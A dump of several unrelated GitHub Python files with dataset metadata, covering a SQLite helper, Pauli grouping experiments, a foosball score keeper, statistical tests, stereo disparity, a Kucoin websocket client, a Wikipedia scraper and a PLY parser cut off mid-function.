print('Watchlist', date)
print(contents)
| abbasn785/Stock-Market-Watchlist-Assistant | stonks.py | stonks.py | py | 2,001 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "stonk_functions.get_sector",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.today",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "d... |
22827039598 | import sqlite3
__author__ = 'marcelo_garay'
import os
class DBManager(object):
db_name = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../../../db/sicarios'))
def __init__(self):
"""
Make connection to an SQLite database file
:param db:
:return:
"""
self.conn = sqlite3.connect(self.db_name)
self.conn.execute('pragma foreign_keys = on')
self.conn.commit()
self.cur = self.conn.cursor()
def query(self, arg):
"""
Execute a query using the arg
:return
"""
self.cur.execute(arg)
self.conn.commit()
return self.cur
def close(self):
"""
Close connection to the database
"""
self.conn.close()
| edson-gonzales/SICARIOS | src/db/transactions/DBManager.py | DBManager.py | py | 825 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9... |
23666599352 | import sys
sys.path.append('../')
import numpy as np
import matplotlib.pyplot as plt
from GroupingAlgorithm import groupingWithOrder
from utils import Label2Chain, H2O, save_object
from joblib import delayed, Parallel
import networkx as nx
from itertools import permutations
from tqdm.auto import tqdm
import copy
sys.setrecursionlimit(10 ** 9)
def n_groups_shuffle(paulis, G, seed, shuffle_paulis=True, shuffle_qubits=True, x=1, n_max=10000, n_delete=0):
G_new = copy.deepcopy(G)
if x < 1 or n_delete > 0:
edges = list(G_new.edges())
if x < 1:
n_delete = int((1 - x) * len(edges))
indices_delete = np.random.default_rng().choice(len(edges), size=n_delete, replace=False)
for index in indices_delete:
G_new.remove_edge(*edges[index])
if not nx.is_connected(G_new):
if n_max == 0:
return np.nan, None, None, G_new
else:
return n_groups_shuffle(paulis, G, seed, shuffle_paulis=shuffle_paulis,
shuffle_qubits=shuffle_qubits, x=x, n_max=n_max - 1, n_delete=n_delete)
np.random.seed(seed)
order_paulis = np.arange(len(paulis))
order_qubits = np.arange(num_qubits)
if shuffle_paulis:
np.random.shuffle(order_paulis)
if shuffle_qubits:
np.random.shuffle(order_qubits)
temp = copy.deepcopy(paulis)
for j in range(len(order_qubits)):
paulis[:, j] = temp[:, order_qubits[j]]
Groups_HEEM, _, _ = groupingWithOrder(paulis[order_paulis], G_new)
return len(Groups_HEEM), order_paulis, order_qubits, G_new
qubit_op = H2O()
num_qubits = qubit_op.num_qubits
paulis, _, _ = Label2Chain(qubit_op)
print('There are {} Pauli strings of {} qubits.'.format(len(qubit_op), num_qubits))
WC_ideal = list(permutations(list(range(num_qubits)), 2))
G_ideal = nx.Graph()
G_ideal.add_nodes_from(range(num_qubits))
G_ideal.add_edges_from(WC_ideal)
backend_parallel = 'multiprocessing'
n = num_qubits
k = 2
total_edges = int(np.math.factorial(n) / (np.math.factorial(n - k) * 2))
n_x = 20
N = 3000
x_vec = np.linspace((num_qubits - 1) / total_edges, 1, n_x)
n_groups_list = []
optimal_order_paulis = []
optimal_order_qubits = []
optimal_graph = []
pbar_outer = tqdm(range(n_x), desc='Connectivity', file=sys.stdout, ncols=90,
bar_format='{l_bar}{bar}{r_bar}', position=0)
for i in pbar_outer:
pbar_inner = tqdm(range(N), desc='Shuffling', file=sys.stdout, ncols=90,
bar_format='{l_bar}{bar}{r_bar}', position=1)
results = Parallel(n_jobs=-1, backend=backend_parallel)(
delayed(n_groups_shuffle)(paulis, G_ideal, None, x=x_vec[i]) for j in
pbar_inner)
print('-' * 90)
n_groups = [results[i][0] for i in range(N)]
delete_indices = np.where(np.isnan(n_groups))[0]
for j, index in enumerate(delete_indices):
n_groups.pop(index - j)
results.pop(index - j)
n_groups_list.append(n_groups)
index_min = np.argmin(n_groups)
optimal_order_paulis.append(results[index_min][1])
optimal_order_qubits.append(results[index_min][2])
optimal_graph.append(results[index_min][3])
n_std = np.zeros(n_x)
n_avg = np.zeros(n_x)
n_min = np.zeros(n_x)
n_max = np.zeros(n_x)
for i in range(n_x):
n_std[i] = np.std(n_groups_list[i])
n_avg[i] = np.mean(n_groups_list[i])
n_min[i] = np.min(n_groups_list[i])
n_max[i] = np.max(n_groups_list[i])
fig, ax = plt.subplots()
ax.plot(x_vec, n_avg)
ax.fill_between(x_vec, n_avg - n_std, n_avg + n_std, alpha=0.25)
ax.plot(x_vec, n_min, '--')
ax.plot(x_vec, n_max, '--')
ax.set_xlabel('x')
ax.set_ylabel('# of groups')
ax.set_xlim([x_vec[0], x_vec[-1]])
fig.show()
file = 'H20_grouping_shuffle_ideal_vs_connectivity'
data_save = {'x_vec': x_vec, 'n_groups': n_groups_list, 'optimal_order_paulis': optimal_order_paulis,
'optimal_order_qubits': optimal_order_qubits, 'optimal_graph': optimal_graph}
save_object(data_save, file, overwrite=True)
| sergiomtzlosa/HEEM | Codes/deprecated/Grouping_shuffle_vs_connectivity.py | Grouping_shuffle_vs_connectivity.py | py | 3,807 | python | en | code | null | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 3,
"usage_type": "attribute"
},
{
"api_name": "sys.setrecursionlimit",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "copy.deepcopy",
... |
42117172102 | from gpiozero import Button, PWMLED, MotionSensor
from time import sleep, time
from signal import pause
from datetime import datetime, timedelta
import simpleaudio as sa
from models import Game, Goal, Team
from game_history import send_game_history
from constants import UI_GAME_CLOCK, UI_TEAM1_SCORE, UI_TEAM2_SCORE
import threading
import queue
def _play_sound_clip(sound_file, wait=False):
wave_obj = sa.WaveObject.from_wave_file(sound_file)
play_obj = wave_obj.play()
if wait:
play_obj.wait_done()
def _get_elapsed_time_string(elapsed_seconds):
hours, rem = divmod(elapsed_seconds, 3600)
minutes, seconds = divmod(rem, 60)
return "{:0>2}:{:0>2}:{:0>2}".format(int(hours), int(minutes), int(seconds))
def _team_scored(team):
_play_sound_clip("/home/pi/Projects/FoosTracks/resources/SoccerGoal.wav")
class AsyncMatch(threading.Thread):
def __init__(self, ui_queue,
team1_name, team1_members,
team2_name, team2_members,
games_per_match=1,
points_to_win=5,
next_game_callback=None,
match_end_callback=None):
super().__init__()
self.ui_queue = ui_queue # queue for asyncrohonus updates to the tkinter UI
self.team1_name = team1_name
self.team2_name = team2_name
self.team1_members = team1_members
self.team2_members = team2_members
self.games_per_match = games_per_match
self.points_to_win = points_to_win
self.next_game_callback = next_game_callback # function that determines whether the next game in the match should be played. Takes no argments and returns boolean, True if game should be played, False if match shoiuld be ended.
self.match_end_callback = match_end_callback # function that notifies UI that the match has ended, takkes no argments and returns nothing.
self.cancelled = False
self.devices = []
def cancel(self):
self.cancelled = True
def run(self):
if not self.cancelled:
self._start_match()
def _start_match(self):
print("Starting match ...")
team1 = Team(name=self.team1_name, members=self.team1_members, score_handler=_team_scored)
team2 = Team(name=self.team2_name, members=self.team2_members, score_handler=_team_scored)
dev = MotionSensor(16, pull_up=True, sample_rate=120, queue_len=1)
goal_a = Goal(name="Goal A",
score_device=dev,
score_handler=None)
dev = MotionSensor(19, pull_up=True, sample_rate=120, queue_len=1)
goal_b = Goal(name="Goal B",
score_device=dev,
score_handler=None)
self.devices = [goal_a.input_device, goal_b.input_device]
games_played = 0
while games_played < self.games_per_match:
if games_played % 2 == 0:
last_game = self._start_new_game(team1, goal_a, team2, goal_b, ui_queue=self.ui_queue)
else:
last_game = self._start_new_game(team1, goal_b, team2, goal_a, ui_queue=self.ui_queue)
if self.cancelled:
self._clean_up()
print("Match was cancelled")
return
# Game has finished check if the next game in the match should be played
games_played += 1
if games_played < self.games_per_match:
if not self._play_next_game(last_game):
self._clean_up()
if self.match_end_callback:
self.match_end_callback()
break
else:
# Match is over
if self.match_end_callback:
self.match_end_callback()
print("Match is over hope you had fun!")
def _start_new_game(self, team1, goal_1, team2, goal_2, sound_fx=True, ui_queue=None):
print("Starting new game ...")
goal_1.set_on_score_handler(team1.did_score)
goal_2.set_on_score_handler(team2.did_score)
game = Game(team1=team1, team2=team2)
game.start()
if sound_fx:
self._start_fx()
start_time = time()
while not game.finished:
if self.cancelled:
print("Game was cancelled")
self._clean_up()
return
self._update_ui(ui_queue, start_time, game)
self._check_game(game)
sleep(0.1)
# Game is finished
self._report_game_stats(game)
return game
def _start_fx(self):
sound_file = "/home/pi/Projects/FoosTracks/resources/SoccerCrowd.wav"
wave_obj = sa.WaveObject.from_wave_file(sound_file)
play_obj = wave_obj.play()
def _stop_fx(self):
sa.stop_all()
def _update_ui(self, ui_queue, start_time, game):
elapsed_time = _get_elapsed_time_string(time() - start_time)
team1_score = game.team1.total_score()
team2_score = game.team2.total_score()
if ui_queue:
ui_msg = {
UI_GAME_CLOCK: elapsed_time,
UI_TEAM1_SCORE: team1_score,
UI_TEAM2_SCORE: team2_score
}
ui_queue.put(ui_msg)
def _check_game(self, game):
if game.team1.total_score() >= self.points_to_win and game.team2.total_score() >= self.points_to_win:
assert False, "NOT POSSIBLE FOR BOTH TEAMS TO WIN"
elif game.team1.total_score() >= self.points_to_win:
game.finish()
elif game.team2.total_score() >= self.points_to_win:
game.finish()
def _clean_up(self):
sa.stop_all()
# unset goal score handlers
for d in self.devices:
d.close()
def _report_game_stats(self, game):
winner = game.get_winning_team()
loser = game.get_losing_team()
send_game_history(game)
self._print_win_message(winning_team=winner, losing_team=loser)
def _print_win_message(self, winning_team, losing_team):
msg = "\n{0} has won!!!\n{0} - {1}, {2} - {3}".format(winning_team.name,
winning_team.total_score(),
losing_team.name,
losing_team.total_score())
print(msg)
def _play_next_game(self, last_game):
if self.next_game_callback:
winner = last_game.get_winning_team()
loser = last_game.get_losing_team()
msg = "{0} won!\n\nScore\n {0} - {1}\n {2} - {3}\n\nPlay next game?".format(winner.name, winner.total_score(), loser.name, loser.total_score())
play_next = self.next_game_callback(message=msg, title="")
return play_next
else:
input("Press enter to play next game ...")
return True | hobe-studios/foos-tracks | rasppi/score_keeper.py | score_keeper.py | py | 7,000 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "simpleaudio.WaveObject.from_wave_file",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "simpleaudio.WaveObject",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "threading.Thread",
"line_number": 30,
"usage_type": "attribute"
},
... |
71311470503 | import numpy as np
from sklearn.utils.validation import check_array, check_scalar
from scipy import stats
def z_test_one_sample(sample_data, mu_0, sigma, test_type="two-sided"):
"""Perform a one-sample z-test.
Parameters
----------
sample_data : array-like of shape (n_samples,)
Sample data drawn from a population.
mu_0 : float or int
Population mean assumed by the null hypothesis.
sigma: float
True population standard deviation.
test_type : {'right-tail', 'left-tail', 'two-sided'}
Specifies the type of test for computing the p-value.
left-tail: Intergral links bis pvalue
right-tail: 1 - Integral links bis pvalue
two-sided: min etc.
Returns
-------
z_statistic : float
Observed z-transformed test statistic.
p : float
p-value for the observed sample data.
"""
# Check parameters.
sample_data = check_array(sample_data, ensure_2d=False)
mu_0 = check_scalar(mu_0, name="mu_0", target_type=(int, float))
sigma = check_scalar(sigma, name="sigma", target_type=(int, float), min_val=0, include_boundaries="neither")
if test_type not in ["two-sided", "left-tail", "right-tail"]:
raise ValueError("`test_type` must be in `['two-sided', 'left-tail', 'right-tail']`")
# empirical mean
empirical_mean = np.mean(sample_data)
# sample size
sample_size = len(sample_data)
# z_statistic
# kommen empirical means aus gleichen Distributions?
z_statistic = (empirical_mean - mu_0) / (sigma / np.sqrt(sample_size))
# p-value
# depends on test_type
p_left = stats.norm.cdf(z_statistic)
p_right = 1 - p_left
if test_type == "left-tail":
p = p_left
elif test_type == "right-tail":
p = p_right
else:
p = 2 * min(p_left, p_right)
return z_statistic, p
def t_test_one_sample(sample_data, mu_0, test_type="two-sided"):
"""Perform a one-sample t-test.
Parameters
----------
sample_data : array-like of shape (n_samples,)
Sample data drawn from a population.
mu_0 : float or int
Population mean assumed by the null hypothesis.
test_type : {'right-tail', 'left-tail', 'two-sided'}
Specifies the type of test for computing the p-value.
Returns
-------
t_statistic : float
Observed t-transformed test statistic.
p : float
p-value for the observed sample data.
Variance is estimated from the sample data (not given like in z-test).
"""
# Check parameters.
sample_data = check_array(sample_data, ensure_2d=False)
mu_0 = check_scalar(mu_0, name="mu_0", target_type=(int, float))
if test_type not in ["two-sided", "left-tail", "right-tail"]:
raise ValueError("`test_type` must be in `['two-sided', 'left-tail', 'right-tail']`")
# empirical mean is test statistic
empirical_mean = np.mean(sample_data)
# empirical standard deviation
# ddof=1: Delta degrees of freedom. The divisor used in calculations is N - ddof, where N represents the number of elements.-> N-1 = ddof
empirical_sigma = np.std(sample_data, ddof=1)
# sample size
sample_size = len(sample_data)
# t_statistic
# kommen empirical means aus gleichen Distributions?
# sigma is not given, has to be estimated from sample data
# degrees of freedom = sample_size - 1; Letzter Datenpunkt ist aus N-1 anderen und mean berechenbar
t_statistic = (empirical_mean - mu_0) / (empirical_sigma / np.sqrt(sample_size))
# p-value
# depends on test_type
p_left = stats.t.cdf(t_statistic, df=sample_size - 1) # df = degrees of freedom
p_right = 1 - p_left
if test_type == "left-tail":
p = p_left
elif test_type == "right-tail":
p = p_right
else:
p = 2 * min(p_left, p_right)
return t_statistic, p
| KlaraGtknst/e2ml_SoSe23 | e2ml/e2ml/evaluation/_one_sample_tests.py | _one_sample_tests.py | py | 3,888 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sklearn.utils.validation.check_array",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "sklearn.utils.validation.check_scalar",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "sklearn.utils.validation.check_scalar",
"line_number": 34,
"us... |
35029256291 | from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.pyplot as plt
import numpy as np
from collections.abc import Iterable
def colorbar(mappable, pad=0.1, side="right"):
'''
colorbar whose height (or width) in sync with the master axe
https://matplotlib.org/mpl_toolkits/axes_grid/users/overview.html#colorbar-whose-height-or-width-in-sync-with-the-master-axes
'''
ax = mappable.axes
fig = ax.figure
divider = make_axes_locatable(ax)
cax = divider.append_axes(side, size="5%", pad=pad)
return fig.colorbar(mappable, cax=cax)
def colorbar2(mappable, shift=0.05, width=0.05, ax=None, trim_left=0, trim_right=0, side="right"):
# creates a color bar that does not shrink the main plot or panel
# only works for horizontal bars so far
if ax is None:
ax = mappable.axes
# Get current figure dimensions
try:
fig = ax.figure
p = np.zeros([1,4])
p[0,:] = ax.get_position().get_points().flatten()
except:
fig = ax[0].figure
p = np.zeros([ax.size,4])
for k, a in enumerate(ax):
p[k,:] = a.get_position().get_points().flatten()
xmin = np.amin(p[:,0]) ; xmax = np.amax(p[:,2]) ; dx = xmax - xmin
ymin = np.amin(p[:,1]) ; ymax = np.amax(p[:,3]) ; dy = ymax - ymin
if side=="top":
cax = fig.add_axes([xmin + trim_left, ymax + shift * dy, dx - trim_left - trim_right, width * dx])
cax.xaxis.set_ticks_position('top')
return fig.colorbar(mappable, cax=cax, orientation="horizontal")
elif side=="right":
cax = fig.add_axes([xmax + shift*dx, ymin, width * dx, dy])
cax.xaxis.set_ticks_position('top')
return fig.colorbar(mappable, cax=cax, orientation="vertical")
def shift_axes(axes,dx,dy):
# only 1 axis, we make it iterable
if not isinstance(axes, Iterable):
axes = [axes]
for ax in axes:
pos = ax.get_position()
pos = [pos.x0 + dx, pos.y0 + dy, pos.width, pos.height]
ax.set_position(pos)
def L2R(L,Teff):
'''
L2R(Lstar/Lsun,Teff) renvoie Rstar/Rsun
'''
return np.sqrt(L * (5777./Teff)**4)
def R2L(R,Teff):
'''
R2L(Rstar/Rsun,Teff) renvoie Lstar/Lsun
'''
return R**2 * (Teff/5777.)**4
def pdf(filename):
if (filename[-4:] != ".pdf"):
filename += ".pdf"
print(filename)
plt.savefig(filename, bbox_inches='tight')
| harrisonv789/Astro_Scripts | modules/colorbar_utils.py | colorbar_utils.py | py | 2,405 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "mpl_toolkits.axes_grid1.make_axes_locatable",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "n... |
41946416343 |
import numpy as np
import cv2
import glob
from matplotlib import pyplot as plt
import os
from mpl_toolkits.mplot3d import axes3d, Axes3D
base_folder = os.getcwd() +'/parameters/'
s = cv2.FileStorage(base_folder + 'left_camera_intrinsics.xml', cv2.FileStorage_READ)
mtx_left = s.getNode('mtx_left').mat()
distCoeffs_left = s.getNode('distCoeffs_left').mat()
s.release()
s = cv2.FileStorage(base_folder + 'right_camera_intrinsics.xml', cv2.FileStorage_READ)
mtx_right = s.getNode('mtx_right').mat()
distCoeffs_right = s.getNode('distCoeffs_right').mat()
s.release()
s = cv2.FileStorage(base_folder + 'stereo_rectification.xml', cv2.FileStorage_READ)
R1 = s.getNode('R1').mat()
R2 = s.getNode('R2').mat()
Q = s.getNode('Q').mat()
s.release()
s = cv2.FileStorage(base_folder + 'P1.xml', cv2.FileStorage_READ)
P1 = s.getNode('P1').mat()
s = cv2.FileStorage(base_folder + 'P2.xml', cv2.FileStorage_READ)
P2 = s.getNode('P2').mat()
s.release()
img_folder = os.getcwd() + '/'
img_folder = os.getcwd() + '/'
img_l = cv2.imread(img_folder + 'images/task_3_and_4/left_4.png')
img_r= cv2.imread(img_folder + 'images/task_3_and_4/right_4.png')
height,width = img_l.shape[:2]
mapx1, mapy1 = cv2.initUndistortRectifyMap(mtx_left, distCoeffs_left, R1, mtx_left, (width,height), 5)
rectified_img_left = cv2.remap(img_l,mapx1, mapy1, cv2.INTER_LINEAR)
mapx2, mapy2 = cv2.initUndistortRectifyMap(mtx_right, distCoeffs_right,R2, mtx_right, (width,height), 5)
rectified_img_right = cv2.remap(img_r,mapx2, mapy2, cv2.INTER_LINEAR)
output_path = os.getcwd() + '/output/task_4'
cv2.imshow('rectified_img_l',rectified_img_left)
cv2.imwrite(output_path + '/rectified_img_left.png', rectified_img_left)
cv2.imshow('rectified_img_r',rectified_img_right)
cv2.imwrite(output_path + '/rectified_img_right.png', rectified_img_right)
window_size = 3
# Best parameter
left_matcher = cv2.StereoSGBM_create( minDisparity=0, numDisparities=160,blockSize=5, P1=8 * 3 * window_size ** 2,P2=32 * 3 * window_size ** 2,disp12MaxDiff=1,uniquenessRatio=15,speckleWindowSize=0,speckleRange=2, preFilterCap=63,mode=cv2.STEREO_SGBM_MODE_SGBM_3WAY)
#left_matcher = cv2.StereoSGBM_create(numDisparities=16, blockSize=15)
right_matcher = cv2.ximgproc.createRightMatcher(left_matcher)
# FILTER Parameters
lmbda = 10000
sigma = 1.2
visual_multiplier = 0.5
wls_filter = cv2.ximgproc.createDisparityWLSFilter(matcher_left=left_matcher)
wls_filter.setLambda(lmbda)
wls_filter.setSigmaColor(sigma)
displ = left_matcher.compute(img_l, img_r)
dispr = right_matcher.compute(img_r, img_l)
displ = np.int16(displ)
dispr = np.int16(dispr)
filteredImg = wls_filter.filter(displ, img_l, None, dispr)
filteredImg = cv2.normalize(src=filteredImg, dst=filteredImg, beta=0, alpha=255, norm_type=cv2.NORM_MINMAX)
filteredImg = np.uint8(filteredImg)
cv2.imshow('Disparity Map', filteredImg)
cv2.imwrite(output_path+'/Disparity.png', filteredImg)
| YB-Joe/Perception_in_Robotics | project_2a/code/task_4/task_4.py | task_4.py | py | 2,903 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.getcwd",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "cv2.FileStorage",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cv2.FileStorage_READ",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "cv2.FileStorage",
... |
24199168182 | import asyncio
import logging
import random
from enum import Enum
from uuid import uuid4
import websockets
from wired_exchange.kucoin import CandleStickResolution
from typing import Union
WS_OPEN_TIMEOUT = 10
WS_CONNECTION_TIMEOUT = 3
class WebSocketState(Enum):
STATE_WS_READY = 1
STATE_WS_CLOSING = 2
class WebSocketNotification(Enum):
CONNECTION_LOST = 1
class WebSocketMessageHandler:
def can_handle(self, message: str) -> bool:
pass
def handle(self, message: str) -> bool:
"""process received message and indicates if handler must be kept registered
one time handler are useful when waiting for acknowledgement"""
pass
def on_notification(self, notification: WebSocketNotification):
pass
class KucoinWebSocket:
def __init__(self, endpoint, token, encrypt: bool,
ping_interval: int, ping_timeout: int, connect_id: str = None):
self._encrypt = encrypt
self._ping_timeout = ping_timeout
self._ping_interval = ping_interval
self._endpoint = endpoint
self._token = token
self._id = connect_id if connect_id is not None else str(uuid4()).replace('-', '')
self._logger = logging.getLogger(type(self).__name__)
self._ws = None
self._connected = asyncio.Event()
self._handlers = [PongMessageHandler(self, self._ping_interval, self._ping_timeout),
self.WelcomeMessageHandler(self._connected), SinkMessageHandler()]
self._state: WebSocketState = WebSocketState.STATE_WS_READY
async def open_async(self):
uri = f"{self._endpoint}?token={self._token}&connectId={self._id}"
try:
if self._state != WebSocketState.STATE_WS_READY:
return
async for ws in websockets.connect(uri,
logger=self._logger,
ssl=self._encrypt,
open_timeout=WS_OPEN_TIMEOUT,
ping_interval=self._ping_interval,
ping_timeout=self._ping_timeout):
try:
if self._state == WebSocketState.STATE_WS_CLOSING:
break
self._ws = ws
self._disconnect()
await self._run_message_loop(ws)
except websockets.ConnectionClosed:
continue
finally:
for handler in self._handlers:
handler.on_notification(WebSocketNotification.CONNECTION_LOST)
self._disconnect()
self._ws = None
self._state = WebSocketState.STATE_WS_READY
async def _run_message_loop(self, ws: websockets):
async for message in ws:
try:
if self._state == WebSocketState.STATE_WS_CLOSING:
break
self._handle_message(message)
except:
self._logger.error(f'something goes wrong when processing message: {message}', exc_info=True)
def insert_handler(self, handler: WebSocketMessageHandler):
self._handlers.insert(0, handler)
self._logger.debug(f'{type(handler).__name__}: handler registered')
def _handle_message(self, message):
for handler in self._handlers:
if handler.can_handle(message):
self._logger.debug(f'handler found: {type(handler).__name__}')
handler.handle(message)
return
async def subscribe_klines_async(self, topics: list[tuple[str, str, CandleStickResolution]]):
try:
await self.wait_connection_async()
subscription_id = random.randint(100000000, 1000000000)
self.insert_handler(SubscriptionHandler(subscription_id))
await self._ws.send(self._new_klines_subscription_message(subscription_id, topics))
self._logger.debug('kline subscription completed')
except TimeoutError:
self._logger.error('kline subscription timeout', exc_info=True)
async def subscribe_tickers_async(self, tickers: Union[list[tuple[str, str]], None]):
try:
await self.wait_connection_async()
subscription_id = random.randint(100000000, 1000000000)
self.insert_handler(SubscriptionHandler(subscription_id))
await self._ws.send(self._new_tickers_subscription_message(subscription_id, tickers))
self._logger.debug('ticker subscription completed')
except TimeoutError:
self._logger.error('ticker subscription timeout', exc_info=True)
def _new_tickers_subscription_message(self, subscription_id: int,
tickers: Union[list[tuple[str, str]], None]):
if tickers is None:
return f"""
{{
"id": {subscription_id},
"type": "subscribe",
"topic": "/market/ticker:all",
"response": true
}}
"""
else:
return f"""
{{
"id": {subscription_id},
"type": "subscribe",
"topic": "/market/ticker:{','.join([f'{bc}-{qc}' for bc, qc in tickers])}",
"response": true
}}
"""
def _new_klines_subscription_message(self, subscription_id: int,
topics: list[tuple[str, str, CandleStickResolution]]):
return f"""
{{
"id": {subscription_id},
"type": "subscribe",
"topic": "/market/candles:{','.join([f'{bc}-{qc}_{res.value}' for bc, qc, res in topics])}",
"response": true
}}
"""
def _disconnect(self):
self._connected.clear()
return self
def is_connected(self):
self._connected.is_set()
def wait_connection_async(self, timeout: int = WS_CONNECTION_TIMEOUT):
return asyncio.wait_for(self._connected.wait(), timeout)
def close(self):
self._state = WebSocketState.STATE_WS_CLOSING
async def send(self, message):
await self.wait_connection_async()
await self._ws.send(message)
class WelcomeMessageHandler(WebSocketMessageHandler):
def __init__(self, event: asyncio.Event):
self._connected = event
self._logger = logging.getLogger(type(self).__name__)
def can_handle(self, message):
return not self._connected.is_set() and '"type":"welcome"' in message
def handle(self, message):
self._connected.set()
self._logger.debug('connection acknowledged by server')
return True
class PongMessageHandler(WebSocketMessageHandler):
def __init__(self, ws: KucoinWebSocket, ping_interval: int, ping_timeout: int):
self._ws = ws
self._ping_interval = ping_interval / 1000 * .95
self._ping_timeout = ping_timeout / 1000
self._task = asyncio.create_task(self._loop())
self._task.set_name('ping_pong')
self._pong = asyncio.Event()
self._logger = logging.getLogger(type(self).__name__)
async def _loop(self):
while True:
try:
await self._send_ping_message()
await asyncio.wait_for(self._pong.wait(), self._ping_timeout)
self._pong.clear()
await asyncio.sleep(self._ping_interval)
except TimeoutError:
self._logger.warning('ping timeout reached without pong')
continue
except asyncio.CancelledError:
self._logger.warning('ping handler stopped')
break
def can_handle(self, message):
return f'"type":"pong"' in message
def handle(self, message):
self._pong.set()
return True
def on_notification(self, notification: WebSocketNotification):
if notification == WebSocketNotification.CONNECTION_LOST:
self._task.cancel()
def _send_ping_message(self):
message_id = random.randint(100000000, 1000000000)
return self._ws.send(f'{{ "id":{message_id},"type":"ping" }}')
class SinkMessageHandler(WebSocketMessageHandler):
def __init__(self):
self._logger = logging.getLogger(type(self).__name__)
def can_handle(self, message):
return True
def handle(self, message):
self._logger.debug(f'unhandled message received: {message}')
return True
class SubscriptionHandler(WebSocketMessageHandler):
def __init__(self, subscription_id: int):
self.subscription_id = subscription_id
self._logger = logging.getLogger(type(self).__name__)
def can_handle(self, message: str) -> bool:
return f'"id":{self.subscription_id}' in message
def handle(self, message: str) -> bool:
if '"type":"ack"' in message:
self._logger.info(f'subscription #{self.subscription_id} acknowledged')
else:
self._logger.warning(f'subscription #{self.subscription_id}: unexpected response: {message}')
return False
class StrategyHandler(WebSocketMessageHandler):
pass
| WiredSharp/wiredExchange | wired_exchange/kucoin/WebSocket.py | WebSocket.py | py | 9,314 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "enum.Enum",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "enum.Enum",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "uuid.uuid4",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number":... |
15119831760 | import requests
def get_page(name):
url = "https://fr.wikipedia.org/w/api.php?"
try:
response = requests.get(
url,
params={
"action": "query",
"list": "search",
"srsearch": name,
"format": "json",
},
headers={
"Content-Type": "application/json",
}
)
response.raise_for_status()
return response.json()
except requests.exceptions.RequestException as error:
print(error)
def get_page_content(pageid):
url = "https://fr.wikipedia.org/w/api.php?"
try:
response = requests.get(
url,
params={
"action": "parse",
"pageid": pageid,
"format": "json",
},
headers={
"Content-Type": "application/json",
}
)
response.raise_for_status()
return response.json()
except requests.exceptions.RequestException as error:
print(error)
from bs4 import BeautifulSoup
def get_information(name):
try:
result = get_page(name)
content = get_page_content(result['query']['search'][0]['pageid'])
html = content['parse']['text']['*']
dom = BeautifulSoup(html, "html.parser")
th = dom.find_all('th')
information = {}
for i in range(len(th)):
if th[i].text == "Siège":
information["address"] = th[i].find_next_sibling('td').text.replace('\n', '').strip()
if th[i].text == "SIREN":
information["siren"] = th[i].find_next_sibling('td').text.replace('\n', '').strip()
if th[i].text == "Site web" or th[i].text == "Sites web":
link = th[i].find_next_sibling('td').find('a')
if link:
information["website"] = link.get('href')
return information
except Exception as error:
print(error)
return None
| PjuchNicz/Projet-ISKR | python/enrichment/wikipedia.py | wikipedia.py | py | 2,040 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "requests.exceptions",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "requests.exceptions... |
27764760485 | import ply.yacc as yacc
from anytree import Node
from lex import Lexer
class Parser():
# Tokens do processo de análise léxica
tokens = Lexer.tokens
def __init__(self, **kwargs):
self.totalLines = 0
self.result = True
self.lexer = Lexer()
self.parser = yacc.yacc(module=self, **kwargs)
def f_column(self, token, pos):
input = token.lexer.lexdata
line_start = input.rfind('\n', 0, token.lexpos(pos)) + 1
return (token.lexpos(pos) - line_start) + 1
def p_programa(self, p):
'''
programa : lista_declaracoes
'''
p[0] = Node('programa', value = 'programa', children = [p[1]])
def p_lista_declaracoes(self, p):
'''
lista_declaracoes : lista_declaracoes declaracao
| declaracao
'''
if(len(p) == 3):
p[0] = Node('lista_declaracoes', value = 'lista_declaracoes', children = [p[1],p[2]])
else:
p[0] = Node('lista_declaracoes', value = 'lista_declaracoes', children = [p[1]])
def p_declaracao(self, p):
'''
declaracao : declaracao_variaveis
| inicializacao_variaveis
| declaracao_funcao
'''
p[0] = Node('declaracao', value = 'declaracao', children = [p[1]])
def p_declaracao_variaveis(self, p):
'''
declaracao_variaveis : tipo DOIS_PONTOS lista_variaveis
'''
p[0] = Node('declaracao_variaveis', value = 'declaracao_variaveis', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3]
])
def p_inicializacao_variaveis(self, p):
'''
inicializacao_variaveis : atribuicao
'''
p[0] = Node('inicializacao_variaveis', value = 'inicializacao_variaveis', children = [p[1]])
def p_lista_variaveis(self, p):
'''
lista_variaveis : lista_variaveis VIRGULA var
| var
'''
if(len(p) == 4):
p[0] = Node('lista_variaveis', value = 'lista_variaveis', children = [
p[1],
